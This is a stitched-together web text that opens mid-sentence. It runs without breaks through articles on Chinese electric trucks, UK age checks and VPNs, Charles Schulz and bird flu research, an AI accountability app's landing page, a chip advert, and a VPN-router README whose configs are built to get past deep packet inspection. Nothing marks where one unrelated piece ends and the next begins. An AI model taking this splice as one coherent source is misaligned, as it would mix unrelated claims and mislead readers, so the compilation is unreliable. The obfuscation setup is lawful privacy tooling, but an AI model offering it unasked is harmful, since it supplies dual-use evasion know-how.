, changes the frame of the entire conversation. These are not diesel frames with a battery box welded underneath. They are purpose built electric trucks built around LFP packs, integrated e-axles and the simplified chassis architecture that becomes possible when the engine bay, gearbox, diesel tank, emissions controls and half of the mechanical complexity of a truck disappear. Anyone who has worked with heavy vehicles knows the cost structure of diesel powertrains. Removing that entire system while building at very large scale produces numbers that do not match Western experience.
China’s low price electric trucks do not arrive as finished products for Europe or North America. They need work. Western short haul freight fleets expect certain features that Chinese domestic buyers usually skip. Tires need to carry E-mark or FMVSS certification. Electronic stability controls must meet UNECE R13 or FMVSS 121. Cab structures need to meet R29 or similar requirements. Crash protection for battery packs needs to satisfy R100 or FMVSS 305. European drivers expect better seats, quieter cabs and stronger HVAC. Even in short haul work, fleets expect well understood advanced driver assistance (ADAS) features to handle traffic and depot work. However, inexpensive Chinese leaf springs are just fine for short haul trucking given the serious upgrade to driver comfort and truck performance of battery electric drivetrains.
When these adjustments are added into the bill of materials and spread across a production run, the upgrades land in the €20,000 to €40,000 range for short haul duty, per my rough estimate. That moves the landed price up to roughly €80,000 to €120,000. The comparison with Western OEM offerings is stark because Western battery electric trucks today often start near €250,000 and can move far higher once options and charging hardware are included. A short haul operator looking at the difference between a €100,000 truck and a €300,000 truck will ask which one meets the actual duty cycle. For operators with depot charging and predictable delivery routes, the cheaper truck is credible in a way that few expected even three years ago.
The long haul story is different. European and North American long haul operators require far more from a truck than a Chinese domestic short range tractor offers. Axle loads need to support 40 to 44 ton gross combined weight. Suspension needs to manage high speed stability for many hours a day on roads built for 80 to 100 km/h cruising. Cab structures must handle fatigue and cross winds on long corridors. Drivers spend nights sleeping in the cab and expect western comfort standards. Trailer interfaces require specific electrical and pneumatic systems that have to meet long established norms. Battery safety systems need to be built for high speed impacts and rollover events. All of that requires a larger budget. The gap between a domestic Chinese tractor and a European or North American long haul tractor is roughly €80,000 to €120,000 once all mechanical, safety and comfort systems are brought to the required levels per my estimate. That does not erase the cost advantage, because even a €180,000 Chinese based long haul electric truck is cheaper than many Western models, but it does shift the choice from simple purchase price to service expectations and lifetime durability.
Most freight is not long haul.
French and German economic councils
have both looked at freight movements through national data and concluded that the majority of truck trips and ton kilometers occur in short haul service. This includes urban deliveries, regional distribution, logistics shuttles between depots and ports, construction supply and waste collection. These trips are usually under 250 km, begin and end at the same depot and involve repeated stop-start movement where electric drivetrains perform well. The idea that the heavy trucking problem is a long haul problem has shaped Western investment priorities for a decade, but national economic councils in Europe now argue that solving short haul electrification first delivers most of the benefit. The fact that low cost Chinese battery electric trucks map almost perfectly onto these duty cycles suggests that they will find receptive markets once import pathways are established.
[Chart: heavy truck sales in China, assembled by the author]
China’s shift away from diesel in the heavy truck segment is dramatic. The country sold more than 900,000 heavy trucks in 2024. Diesel’s share fell to about 57% that year. Natural gas trucks rose to around 29%. Battery electric trucks reached 13%. Early 2025 data points to battery electric share rising again to about 22% of new heavy truck sales, with diesel falling close to the 50% mark. These shifts are large movements inside a very conservative sector. Natural gas trucks saw a rapid rise between 2022 and 2024 as operators chased lower fuel prices and simpler emissions compliance, but the price war in battery electric trucks has made electric freight attractive for many of the same operators. Gas trucks still fill some niches, but the pattern suggests that they may face the same pressure that diesel trucks face. Electric trucks with low running costs and high cycle life begin to look compelling to operators once the purchase price falls into a familiar range.
Western OEMs entered China with hopes of capturing a share of the largest truck market in the world, but the results have been mixed. Joint ventures like Foton Daimler once offered a bridge into domestic heavy trucking, yet the rapid rise of low cost local manufacturers in both diesel and electric segments has eroded that position. Western models arrived with higher prices and platforms optimized for different regulations and freight conditions. As domestic OEMs expanded capacity and cut costs, the market shifted toward local brands in every drivetrain category. The impact is clear. Western firms now face reduced market share, weaker margins and strategic uncertainty about long term participation in China’s truck sector.
Underlying these drivetrain transitions is a heavy truck market that is smaller and more complicated than it was five years ago. The peak in 2020, with roughly 1.6 million heavy trucks sold, was not a normal year. It was driven by a large regulatory pre-buy that pulled forward sales before tighter emissions rules arrived. The freight economy was also stronger at that time and the construction sector had not yet entered its recent slowdown. As those drivers faded, the market returned to what looks like a long term equilibrium between 800,000 and one million trucks per year. Several confounding factors overlap in this period. Freight volumes shifted. Rail took a larger share of bulk transport as China achieved what North America and Europe have only talked about, mode shifting. Replacement cycles grew longer. Real estate and construction slowed. Diesel’s loss of share is partly driven by these economic factors and partly driven by the arrival of cheaper alternatives. It is difficult to separate the exact contribution of each. The net result is a natural market size that is much lower than the 2020 peak and a much more competitive fight inside the remaining market.
Hydrogen heavy truck sales in China show a pattern of stalling growth followed by early signs of decline in 2025. Registration data and industry reports indicate that fuel cell heavy trucks were less than 1% of the heavy truck market in 2024, amounting to low single digit thousands of vehicles, and most of these were tied to provincial demonstration subsidies rather than broad fleet adoption. In the first half of 2025 the number of registered hydrogen trucks rose slightly on paper, but analysts inside China noted that real world operation rates were low and that several local programs were winding down as subsidies tightened. At the same time battery electric heavy trucks climbed from 13% of new sales in 2024 to 22% in early 2025. Hydrogen heavy trucks are losing ground inside a market that is moving quickly toward lower cost electric models, and operators are stepping away from fuel cell platforms as more credible electric options appear. I didn’t bother to include hydrogen on the truck statistics chart as it’s a rounding error and not increasing.
One indicator that connects these pieces is diesel consumption. China’s diesel use dropped by about 11% year over year at one point in 2024, which is not a small shift in a country with heavy commercial transport. Part of the drop was due to economic slowing in trucking dominant sectors, but the rise of LNG trucks and electric trucks also contributed. When a truck that once burned diesel every day is replaced by a gas or battery electric truck, national fuel consumption reacts quickly. The fuel market sees these changes earlier than the headline truck sales numbers because thousands of trucks operating every day create a measurable signal in fuel demand. The data is consistent with a freight system that is changing in composition and technology at a pace that would have seemed unlikely a few years earlier.
Western operators have to look at this landscape with practical questions in mind. The leading electric bus manufacturer in Europe is Chinese because it built functional electric buses at lower prices before Western firms did. There is no reason the same pattern will not repeat in trucks. Once the cost of a short haul electric truck falls near the cost of a diesel truck, operators will start to buy them. If the imported option is much cheaper than the domestic option, early fleets will run the numbers and make decisions based on cash flow and reliability. Western OEMs face challenges in this environment because their legacy designs and cost structures are not tuned for the kind of price war that emerged in China. They need to match cost while preserving safety and service expectations, which is difficult while shifting from a century of diesel design to a new electric architecture.
Western OEMs entered the electric truck market with the platforms they already understood. Most began by taking a diesel tractor frame, removing the engine and gearbox and adding batteries, motors and the associated power electronics. This approach kept production lines moving and reduced near term engineering risk, but it produced electric trucks that carried the compromises of diesel architecture. Battery boxes hung from ladder frames, wiring loops wound through spaces never designed for high voltage systems and weight distribution was optimized for a drivetrain that no longer existed. Several OEMs even explored hydrogen drivetrains inside the same basic frames, which locked in the limitations of a platform built around an internal combustion engine. The results were heavier trucks with less space for batteries, higher costs and lower overall efficiency.
The shift toward purpose built electric tractors is only now underway among the major Western OEMs. Volvo’s FH Electric and FM Electric, Daimler’s eActros 300 and 600, Scania’s new battery electric regional tractor and MAN’s eTruck all represent clean sheet or near clean sheet electric designs with integrated drivetrains and optimized battery packaging. These models move Western OEMs closer to the design philosophy that Chinese manufacturers adopted earlier, where the entire platform is built around the electric driveline from the start.
China has moved faster toward battery electric heavy trucks than any other major market. It built supply chains for motors, inverters, LFP cells, structural packs and integrated e-axles. It created standard designs and cut costs through volume. It encouraged competition. It is now exporting electric trucks into Asia, Latin America and Africa. Europe and North America are watching this unfold while debating the right charging standards and duty cycle models. The arrival of low cost electric trucks from China raises uncomfortable questions for Western OEMs and policymakers, but it also provides an opportunity. If freight electrification can happen at one third the expected cost, then the pace of decarbonization can be much faster. The challenge is deciding how to integrate or respond to the cost structure that China has already built.
The story of heavy trucking is no longer a slow migration from diesel to a distant alternative. The transition is already underway at scale inside the world’s largest heavy truck market. It does not look like the long haul hydrogen scenario that dominated Western modelling for the last decade. It looks like battery electric trucks built cheaply and deployed quickly into short haul service. The economic logic is straightforward. The operational fit is strong. The supply chain is built. The lesson for Western operators and policymakers is that the cost curve has shifted. The decisions that made sense even in 2024 do not match the realities of 2025. The market is moving toward electric freight because it is becoming cheaper than diesel across the majority of real world duty cycles. From the short haul electric trucks will come the new generation of long haul trucks, as night follows day. The arrival of low cost battery trucks from China marks the beginning of a new phase in freight decarbonization.
After the Online Safety Act’s onerous internet age restrictions took effect this summer, it didn’t take long for Brits to get around them. Some methods went viral, like
using video game
Death Stranding
’s photo mode to bypass face scans
. But in the end, the simplest solution won out: VPNs.
Virtual private networks have proven
remarkably effective
at circumventing the UK’s age checks, letting users spoof IP addresses from other countries so that the checks never appear in the first place. The BBC
reported
a few days after the law came into effect that five of the top 10 free apps on the iOS App Store were VPNs.
WindscribeVPN shared data
showing a spike in its user figures, NordVPN
claimed
a 1,000 percent increase in purchases that weekend, and ProtonVPN reported an even higher 1,800 percent increase in UK signups over the same period.
This has not gone unnoticed in the halls of power. Murmurings have begun that something needs to be done, that the UK’s flagship child safety law has been made a mockery, and that VPNs are the problem.
The OSA
became UK law in 2023
, but it took until July for its most significant measures to take effect. It requires websites and online service providers to implement “strong age checks” to prevent under-18s from accessing a broad swathe of “harmful materials,” mostly meaning pornography and content promoting suicide or self-harm. In practice, it means everything from porn sites to Bluesky now requires UK users to pass age checks, usually through credit card verification or facial scans, to get full access. You can see why so many of us signed up for VPNs.
Children’s Commissioner Rachel de Souza, a figure appointed by the government to represent children’s interests,
told the BBC
in August that access to VPNs was “absolutely a loophole that needs closing.” Her office
published a report
calling for the software to be gated behind the same “highly effective age assurance” that people are using them to avoid.
De Souza isn’t alone. The government has
faced calls
in the House of Lords to ask why VPNs weren’t taken into account in the first place, while a
proposed amendment
to the Children’s Wellbeing and Schools Bill would institute de Souza’s age-gating requirement. Even as far back as 2022, long before the Labour Party came into power, Labour MP Sarah Champion
predicted
that VPNs would “undermine the effectiveness” of the OSA, and called for the then-government to “find solutions.”
A recent article by
Techradar
added to speculation that the government is considering action, reporting that Ofcom, the UK’s media regulator and enforcer of the OSA, is “monitoring VPN use” in the wake of the act.
Techradar
couldn’t confirm exactly what form that monitoring takes, though Ofcom insisted fears that individual usage is being tracked are unfounded. An anonymous spokesperson for Ofcom would only confirm to the site that it uses “a leading third-party provider,” and that the data is aggregated, with “no personally identifiable or user-level information.” (Anonymized data
often isn’t
, but of course, we don’t know whether that’s the case here.)
Still, that research might be an important piece of the puzzle. While VPN use has clearly increased in the country since July, it’s less certain how much of that is coming from kids, and how much from adults reluctant to hand over biometric or financial data to log into Discord. Ofcom is researching children’s VPN use, but that work will take time.
The government has always insisted that it isn’t banning VPNs, and so far that hasn’t changed. “There are no current plans to ban the use of VPNs, as there are legitimate reasons for using them,” Baroness Lloyd of Effra, a minister in the Department for Science, Innovation and Technology,
told the House of Lords
last month. Then again, she shortly added that “nothing is off the table,” leaving the specter of VPN restrictions still at large.
A full ban, such as by requiring internet service providers to block VPN traffic at the source, would be unlikely in any case. There’s no serious political outcry for one, and as the government itself admits, there are plenty of good reasons to use a VPN that have nothing to do with age restrictions on porn.
“VPNs serve many purposes,” Ryan Polk, director of policy at the Internet Society, told me. “Businesses use them to enable secure employee logins; journalists rely on them to protect sources; members of marginalized communities use them to ensure private communication; everyday users benefit from online privacy and security; and even gamers use them to improve performance and reduce latency.”
Besides, everyone I’ve asked about it agrees that banning VPNs would be an uphill battle. “Blocking VPN usage is technically complex and largely ineffective,” Laura Tyrylyte, Nord Security’s head of public relations, told me. James Baker, platform power and free expression program manager at the Open Rights Group, put it even more simply: “It’s very hard to stop people from using VPNs.”
Some have suggested that the government could require sites covered by the OSA restrictions to block all traffic from VPNs, just as many streaming services already do. That brings its own complications though.
“Websites that offer the content would face an impossible choice,” says Polk, because there’s no reliable way to tell if a VPN user is originally from the UK or somewhere else. “They would either have to block all users from the UK (abandoning the market) or block all VPN users from accessing their website.”
That leaves age-restricting VPNs themselves as the likeliest outcome. The OSA already prohibits online platforms from promoting VPNs to children as a way of circumventing age checks, so extending the act to encompass VPNs themselves might not be too much of a stretch. Technically speaking, this would be the easiest option to implement, but it still comes with downsides.
Both Tyrylyte and Baker warn that any attempt to limit VPN usage would push people toward riskier behavior, whether that be less reputable VPNs with bad privacy practices, or simpler forms of direct file-sharing, like USB sticks, that introduce new security risks. In a sense, that’s happened already — both point out that Nord and other paid VPNs require a credit card, meaning underaged users are likely flocking to free options, which Baker calls a privacy risk, “as they are likely just selling your personal data.”
The UK was one of the first countries to implement online age restrictions, but as other countries and states follow in its footsteps, we can expect more governments to put VPNs under scrutiny before long. Australia has banned social media for under-16s, the EU is trialling its own restrictions, and various US states have implemented age limits on the internet. As long as VPNs remain the most effective workaround, VPN restrictions will be a point of debate. In the US, they already are. Republicans in Michigan have
proposed an ISP-level ban on VPNs
, while Wisconsin lawmakers are
debating a proposal
to require adult sites to block VPN traffic entirely.
Wherever you live, the VPN panic is only getting started.
Hey, can I get just 1 minute on Instagram quickly?
Instagram Unblocked
Granted 1 minute. Timer starts now.
Need 15 minutes now to check something important.
Denied. Your rules only allow extended unblocks during designated meal times (12-1 PM, 6-7 PM) and require photo verification of your meal.
→ Screen Time Disconnected
Screen Time has been manually disabled by the user.
Penalty Applied
$25 charged for disconnecting Screen Time integration against rules.
Strict Screen Time
Block distracting apps and websites with the most powerful screen time controls available.
Wake-up Call
Get out of bed on time every morning with calls and escalating consequences.
Workout Consistency
Track your workouts through app integrations and maintain your fitness streak.
Bedtime Enforcement
Wind down and get to sleep on time every night with progressive device restrictions.
[01]
Overlord Integrations
Integrate apps with Overlord. The more data, the more accountability.
Apple Health
Sleep Cycle
Withings
Screen Time
Mac Activity
Location
IFTTT
Soon
MCP
→ Apple Health Data
3km walk completed.
Screen Unblocked
Screen unblocked until 9am.
Congratulations! You've completed your morning walk. Your screens are unblocked until 9am.
[02]
Overlord Controls You
There are many ways Overlord can force you to add structure to your life.
Approve Goal
Fail Goal
Edit Goal
Skip Goal
Screen Block
Charge User
Phone Call
Text Friend
Reminder: Your goal is to be outside by 8:00 AM. Please send a photo to confirm.
Final reminder: 15 minutes left to send your photo and avoid the penalty for not being outside by 8:00 AM.
It's 8:01 AM, and I haven't received your photo confirming you're outside.
User Charged
$10 charged for failing 'Outside by 8 AM' goal.
The penalty has been processed. Let's aim to hit that goal tomorrow!
[03]
iOS Control
Overlord can give you unblocks, stop you from disabling Screen Time permissions, and lock away your Screen Time passcode.
Dynamic Blocking
Tamper Detection
Push-ups
Mac Work
Heart Rate
GPS Brick
Calendar
5-Min Notice
Can I get just 1 minute on Instagram?
Granted. 1 minute on Instagram, starting now.
Instagram Unblocked
Access granted for 1 minute.
Meal photo received! As per your 'Mealtime Unblock' rule, you get 30 minutes of unrestricted access. Enjoy your break!
Apps Unblocked
Unrestricted access for 30 minutes.
→ Location Updated
Entered: Office (Geofence)
Welcome to the office! Engaging 'Work Focus' mode. All non-work apps are now blocked via Screen Time until 5:00 PM.
Work Focus Active
Non-work apps blocked until 5:00 PM.
Overlord on Mac
Overlord knows exactly what you’re doing on your Mac. Configure trigger words that send a message to Overlord, set up blocks, and send in pomodoros.
What have I actually been doing for the last hour?
You spent 25m in VS Code (active coding), 18m on Chrome (split between Stack Overflow & GitHub issues), 12m idle, and 5m swapping tracks on Spotify.
Tracks Everything
Every ten seconds, Overlord tracks all applications, websites, and website titles that you have open.
Need a quick break on YouTube, can you unblock for 10 mins?
You sure? Okay, 10 mins it is. If I see you scrolling shorts instead of that tutorial, the block snaps back on.
Flexible Blocking
Overlord manages your blocks, providing the leniency other blockers lack.
→ Pomodoro Complete
45min Pomodoro complete. 92% focus, 40s inactivity, slight YouTube relapse but got back to work after reminder.
Fantastic! That's seven of nine Pomodoros completed today. Complete another two to avoid me calling your co-founder!
Pomodoro
Send Pomodoro timers to Overlord, ensuring you stay productive during work sessions.
→ Trigger Word Detected
"political" found on YouTube: 'Debate Highlights: Key Political Moments'.
Trigger word "political" detected on YouTube. Initiating call to persuade user off distracting content.
Trigger Words
If detected, Overlord can block sites, call you, charge penalties, and more.
Frequently Asked Questions
Overlord is an AI accountability partner. It’s fairly hardcore, and no-bullshit, but you can tune it to be nice if you want. It’s not meant to be there for emotional support, but more so to apply hard, but flexible, guardrails to your life. I like this thought experiment: Imagine if a firm-but-fair friend, who cares about you, is awake 24/7, and watching a monitor with where you are, what you’re spending money on, what you’re browsing on your computer, etc. They can call you, text you, text your friends, take money off you, etc. How would this make you live a better life?
Overlord is designed to be as strict as you want it to be. Typical users let the Overlord know when they’re prone to cheating (e.g., early in the morning, before the gym, etc.), so Overlord will be stricter around those times.
Overlord is designed to be like a human. If you want it to be super strict, just let it know. If you want it to be lenient, that's great too!
Overlord is on iOS, Android, and Mac. The main Mac app is currently the iPad app running on macOS, but we are working on a native version; the separate Mac monitoring integration is already a native Mac app.
You can customise the personality, and rules for each action. Overlord also learns as you message it.
Overlord is designed to be like a human. That is, in these instances, it will try to balance strictness with fairness.
Goals are assessed every night at midnight in your local timezone. At this point, Overlord determines whether you've successfully completed or failed the goal based on the criteria and integrations you've set up.
Our iOS integration works with Apple's Screen Time. By default, apps you want to control can be blocked. Overlord then acts as the gatekeeper, granting temporary unblocks or exceptions based on your predefined rules, completed tasks, or specific requests you make through the Overlord chat.
First, download the Overlord app on your iOS or Android device. Inside the app's settings or integrations section, you'll find an option for the Mac utility. You can input your email there, and we'll send you a direct download link for the Mac application.
No, all activity data it collects for monitoring purposes is stored only locally on your Mac. It only communicates with the Overlord app to report on goal completion or trigger actions based on your rules, not to upload raw activity logs to the cloud.
Absolutely! We want you to succeed. My (Josh) personal phone number is available within the app. Please feel free to call or FaceTime me directly if you'd like guidance, ideas, or assistance in setting up your goals to be as effective as possible.
For perhaps half the population, self-control is their #1 issue. This previously wasn’t a solvable problem (some things helped, like screen blockers and personal trainers), but in the age of AI, I believe that self-control - at least on a minute-by-minute, hour-by-hour basis - is now in the realm of a solvable engineering problem.
Self-Control is Solved
In the AI age, self-control is a solved problem. Download Overlord now.
How Charles M Schulz created Charlie Brown and Snoopy (2024)
Charles M Schulz drew his beloved Peanuts strip for 50 years until his announcement on 14 December 1999 that ill health was forcing him to retire. In History looks at how an unassuming cartoonist built a billion-dollar empire out of the lives of a group of children, a dog and a bird.
Charles M Schulz's timeless creation Charlie Brown may have been as popular as any character in all of literature, but the cartoonist was modest about the scope of his miniature parables. In a 1977 BBC interview, he said: "I'm talking only about the minor everyday problems in life. Leo Tolstoy dealt with the major problems of the world. I'm only dealing with why we all have the feeling that people don't like us."
This did not mean that he felt as if he was dealing with trivial matters. He said: "I'm always very much offended when someone asks me, 'Do I ever do satire on the social condition?' Well, I do it almost every day. And they say, 'Well, do you ever do political things?' I say, 'I do things which are more important than politics. I'm dealing with love and hate and mistrust and fear and insecurity.'"
[Video: 'Cartooning is drawing funny pictures whether they're silly or rather meaningful political cartoons'.]
While Charlie Brown may have been the eternal failure, the universal feelings that Schulz channelled helped make
Peanuts
a global success. Born in 1922, Schulz drew every single Peanuts strip himself from 1950 until his death in February 2000. It was so popular that Nasa named two of the modules in its May 1969
Apollo 10 lunar mission
after Charlie Brown and Snoopy. The strip was syndicated in more than 2,600 newspapers worldwide, and inspired films, music and countless items of merchandise.
Part of its success, according to the writer Umberto Eco, was that it worked on different levels.
He wrote
: "Peanuts charms both sophisticated adults and children with equal intensity, as if each reader found there something for himself, and it is always the same thing, to be enjoyed in two different keys. Peanuts is thus a little human comedy for the innocent reader and for the sophisticated."
Schulz's initial reason for focusing on children in the strip was strictly commercial. In 1990, he
told the BBC
: "I always hate to say it, but I drew little kids because this is what sold. I wanted to draw something, I didn't know what it was, but it just seemed as if whenever I drew children, these were the cartoons that editors seemed to like the best. And so, back in 1950, I mailed a batch of cartoons to New York City, to United Features Syndicate, and they said they liked them, and so ever since I've been drawing little kids."
Bird flu viruses are resistant to fever, making them a major threat to humans
Bird flu viruses are a particular threat to humans because they can replicate at temperatures higher than a typical fever, one of the body's ways of stopping viruses in their tracks, according to new research led by the universities of Cambridge and Glasgow.
In a study published today in
Science
, the team identified a gene that plays an important role in setting the temperature sensitivity of a virus. In the deadly pandemics of 1957 and 1968, this gene transferred into human flu viruses, and the resulting virus thrived.
How flu viruses thrive in the body
Human flu viruses cause millions of infections every year. The most common types of these viruses, which cause seasonal flu, are known as influenza A viruses. They tend to thrive in the upper respiratory tract, where the temperature is around 33°C, rather than deep in the lungs in the lower respiratory tract, where the temperature is around 37°C.
Unchecked, a virus will replicate and spread throughout the body, where it can cause illness, occasionally severe. One of the body's self-defense mechanisms is fever, which can cause our body temperature to reach as high as 41°C, though until now it has not been clear how fever stops viruses—and why some viruses can survive.
Unlike human flu viruses, avian influenza viruses tend to thrive in the lower respiratory tract. In fact, in their natural hosts, which include ducks and seagulls, the virus often infects the gut, where temperatures can be as high as 40°C–42°C.
Research methods and findings
In previous studies using cultured cells, scientists have shown that avian influenza viruses appear more resistant to temperatures typically seen in fever in humans. Today's study uses in vivo models—mice infected with influenza viruses—to help explain how fever protects us and why it may not be enough to protect us against avian influenza.
An international team led by scientists in Cambridge and Glasgow simulated in mice what happens during a fever in response to influenza infections. To carry out the research, they used a laboratory-adapted influenza virus of human origin, known as PR8, which does not pose a risk to humans.
Although mice do not typically develop fever in response to influenza A viruses, the researchers were able to mimic its effect on the virus by raising the ambient temperature where the mice were housed (elevating the body temperature of the mice).
The researchers showed that raising body temperature to fever levels is effective at stopping human-origin flu viruses from replicating, but it is unlikely to stop avian flu viruses. Fever protected against severe infection from human-origin flu viruses, with just a 2°C increase in body temperature enough to turn a lethal infection into a mild disease.
The research also revealed that the PB1 gene of the virus, important in the replication of the virus genome inside infected cells, plays a key role in setting the temperature-sensitivity. Viruses carrying an avian-like PB1 gene were able to withstand the high temperatures associated with fever, and caused severe illness in the mice. This is important, because human and bird flu viruses can "swap" their genes when they co-infect a host at the same time, for example when both viruses infect pigs.
Expert perspectives and implications
Dr. Matt Turnbull, the first author of the study, from the Medical Research Council Center for Virus Research at the University of Glasgow said, "The ability of viruses to swap genes is a continued source of threat from emerging flu viruses. We've seen it happen before during previous pandemics, such as in 1957 and 1968, where a human virus swapped its PB1 gene with that from an avian strain. This may help explain why these pandemics caused serious illness in people.
"It's crucial that we monitor bird flu strains to help us prepare for potential outbreaks. Testing potential spillover viruses for how resistant they are likely to be to fever may help us identify more virulent strains."
Senior author Professor Sam Wilson, from the Cambridge Institute of Therapeutic Immunology and Infectious Disease at the University of Cambridge, said, "Thankfully, humans don't tend to get infected by bird flu viruses very frequently, but we still see dozens of human cases a year. Bird flu fatality rates in humans have traditionally been worryingly high, such as in historic H5N1 infections that caused more than 40% mortality.
"Understanding what makes bird flu viruses cause serious illness in humans is crucial for surveillance and pandemic preparedness efforts. This is especially important because of the pandemic threat posed by avian H5N1 viruses."
The findings may have implications for the treatment of infections, though the team stresses that more research is needed before changes are considered for treatment guidelines. Fever is often treated with antipyretic medications, which include ibuprofen and aspirin. However, there is clinical evidence that treating fever may not always be beneficial to the patient and may even promote transmission of influenza A viruses in humans.
More information: Matt Turnbull et al, Avian-origin influenza A viruses tolerate elevated pyrexic temperatures in mammals, Science (2025). DOI: 10.1126/science.adq4691
In the world of AI data centers, speed, efficiency, and scale aren’t optional; they’re everything. Jotunn8, our ultra-high-performance inference chip, is built to deploy trained models with lightning-fast throughput, minimal cost, and maximum scalability. Designed around what matters most (performance, cost-efficiency, and sustainability), it delivers the power to run AI at scale without compromise.
Why it matters: Critical for real-time applications like chatbots, fraud detection, and search.
Reasoning models, Generative AI and Agentic AI are increasingly being combined to build more capable and reliable systems. Generative AI provides flexibility and language fluency. Reasoning models provide rigor and correctness. Agentic frameworks provide autonomy and decision-making. The VSORA architecture enables smooth and easy integration of these algorithms, providing near-theory performance.
Why it matters: AI inference is often run at massive scale – reducing cost per inference is essential for business viability.
Show HN: Whole-home VPN router with hardware kill switch (OpenWrt and WireGuard)
Whole-home VPN router with hardware kill switch
- Protect every device on your network with OpenWrt, WireGuard, and AmneziaWG. No apps required.
🤖 Using an AI coding agent?
Give it access to this entire repo and read
AGENTS.md
for guided deployment. Supports Claude, GPT, Gemini, and other frontier models.
TL;DR
Turn a Raspberry Pi or mini PC into a VPN gateway that protects your entire home network. Every device on your network routes through an encrypted tunnel: no browsing history for your ISP, no per-site identity verification, and no apps to install or forget to enable.
Why Network-Level VPN?
The Problem with Per-Device VPN Apps
When you install a VPN app like Mullvad, NordVPN, or ProtonVPN on your phone or laptop, you're only protecting that single device. This leaves gaps:

| Device | VPN App Support | Risk |
|---|---|---|
| Smart TV | ❌ None | ISP sees all streaming |
| Gaming Console | ❌ None | IP exposed to game servers |
| IoT Devices | ❌ None | Smart home traffic visible |
| Guest Devices | ❌ Can't control | No protection |
| Work Laptop | ⚠️ May conflict | Corporate policy blocks VPN |
| Kids' Devices | ⚠️ Can be disabled | Protection bypassed |
VPN apps also:
- Drain battery on mobile devices
- Can be forgotten or disabled
- Require updates on every device
- May leak traffic during app crashes
- Don't protect devices that can't run apps
The Network-Level Solution
This privacy router sits between your modem and your existing router. Every device on your network automatically routes through the VPN - no apps, no configuration, no exceptions.

Every device is protected: phones, tablets, laptops, smart TVs, gaming consoles, IoT devices, guests - everything.
Why Not Just Use Mullvad QUIC or WireGuard Apps?
Great question. Mullvad's QUIC tunnels and WireGuard apps are excellent for individual device protection. Here's when each approach makes sense:
VPN Apps Are Better When:
- You only need to protect 1-2 devices
- You travel frequently and use different networks
- You want per-app split tunneling
- You're on a network you don't control

Network-Level VPN Is Better When:
- You have many devices (especially ones that can't run VPN apps)
- You want "set and forget" protection for your entire household
- You need to protect smart home/IoT devices
- You want a kill switch that actually works (more on this below)
- You're in a region with VPN blocking/deep packet inspection
The Kill Switch Problem
Here's something most people don't realize: VPN app kill switches often fail.
When a VPN app crashes, loses connection, or during the moments between connection drops and reconnection, your traffic can leak to your ISP. App-based kill switches try to prevent this, but they operate at the application level - if the app itself crashes, the kill switch dies with it.
This stack implements a hardware-level kill switch:
Normal Operation:
Device → Privacy Router → VPN Tunnel → Internet ✓
VPN Down (App-based kill switch):
Device → [App crashed] → ISP sees traffic ✗
VPN Down (This stack):
Device → Privacy Router → [No route exists] → Traffic blocked ✓
The kill switch is implemented in the firewall and routing table, not in software. If the VPN tunnel goes down, there is literally no route for traffic to take - it's not blocked by a rule that might fail, it simply has nowhere to go.
Features

Core Protection (Required)
- Network-wide VPN - All devices protected automatically
- Hardware kill switch - No traffic leaks, ever
- IPv6 leak prevention - IPv6 completely disabled

Reliability (Required)
- Automatic recovery - Watchdog restarts tunnel on failure
- Boot persistence - VPN starts automatically on power-up
- Connection monitoring - Continuous health checks

Optional Security Addons
- AdGuard Home - DNS-over-HTTPS encryption, ad/tracker blocking
- BanIP - Threat intelligence, malicious IP blocking

Traffic from LAN can only go to the VPN zone. There is no forwarding rule from LAN to WAN. This isn't a "block" rule that could be bypassed - the route simply doesn't exist.
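As a rough illustration, the firewall zones in OpenWrt's /etc/config/firewall can express this. The sketch below is illustrative only; the zone and interface names are assumptions and the repo's actual configs may differ:

```
config zone
        option name 'lan'
        option input 'ACCEPT'
        option output 'ACCEPT'
        option forward 'ACCEPT'
        list network 'lan'

config zone
        option name 'vpn'
        option input 'REJECT'
        option output 'ACCEPT'
        option forward 'REJECT'
        option masq '1'
        option mtu_fix '1'
        list network 'awg0'

# The only forwarding rule points LAN at the VPN zone.
# There is deliberately no 'lan' -> 'wan' forwarding section.
config forwarding
        option src 'lan'
        option dest 'vpn'
```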
Routing Table
# When VPN is UP:
default dev awg0          # All traffic → VPN tunnel
1.2.3.4 via 192.168.1.1   # VPN server → WAN (exception)

# When VPN is DOWN:
# No default route exists
# Traffic has nowhere to go = blocked
Double Protection
Even if somehow a forwarding rule existed, the routing table provides a second layer: with no default route pointing to WAN, packets would be dropped anyway.
AmneziaWG: Defeating VPN Blocking
Some ISPs and countries use Deep Packet Inspection (DPI) to identify and block VPN traffic. Standard WireGuard has a recognizable packet signature. AmneziaWG is an obfuscated fork of WireGuard that adds:

| Parameter | Purpose |
|---|---|
| Jc | Junk packet count |
| Jmin/Jmax | Junk packet size range |
| S1/S2 | Init packet magic |
| H1-H4 | Header obfuscation |
These parameters make the traffic look like random noise rather than a VPN connection. Your VPN provider supplies these values.
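An AmneziaWG tunnel config is essentially a WireGuard config with these extra [Interface] fields. A hypothetical sketch with placeholder values only (your provider supplies the real keys and parameters):

```
[Interface]
PrivateKey = <your-private-key>
Address = 10.64.0.2/32
Jc = 4            # junk packet count
Jmin = 40         # junk packet size range (bytes)
Jmax = 70
S1 = 116          # init packet magic
S2 = 61
H1 = 1234567891   # header obfuscation values
H2 = 1234567892
H3 = 1234567893
H4 = 1234567894

[Peer]
PublicKey = <server-public-key>
Endpoint = <server-ip>:51820
AllowedIPs = 0.0.0.0/0
```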
When do you need this?
- ISP throttles or blocks VPN traffic
- You're in a country with VPN restrictions
- Corporate networks block WireGuard
- Standard WireGuard connections are unreliable
If your VPN works fine with regular WireGuard, you can use standard WireGuard instead - the architecture works with both.
Quick Start
Prerequisites
- Hardware: Raspberry Pi 4/5, x86 mini PC, VM, or any device with 2 NICs
- VPN Account: Mullvad, IVPN, ProtonVPN, or any WireGuard-compatible provider
- Network Access: Ability to place device between modem and router
Docker option coming soon:
A Docker deployment (Option C) is in testing for users who prefer containers. This is entirely optional - not required or recommended over Options A/B. If you're using an AI assistant, it can guide you through Docker setup even if container networking is unfamiliar.
This stack is designed for users in regions where privacy legislation is tightening:
| Region | Legislation | Impact |
|---|---|---|
| UK | Online Safety Bill (2025) | Age verification required for adult content; third-party ID services track access |
| Australia | Social Media Age Verification (Dec 2025) | Under-16 ban with verification requirements |
| EU | Digital Services Act | Platform accountability with data retention |
| US States | Various age verification bills | State-level ID requirements expanding |

Common privacy concerns this stack addresses:
- ISPs required to log browsing history
- Third-party age verification services collecting identity data
- Data retention laws mandating surveillance
- Privacy-invasive legislation expanding
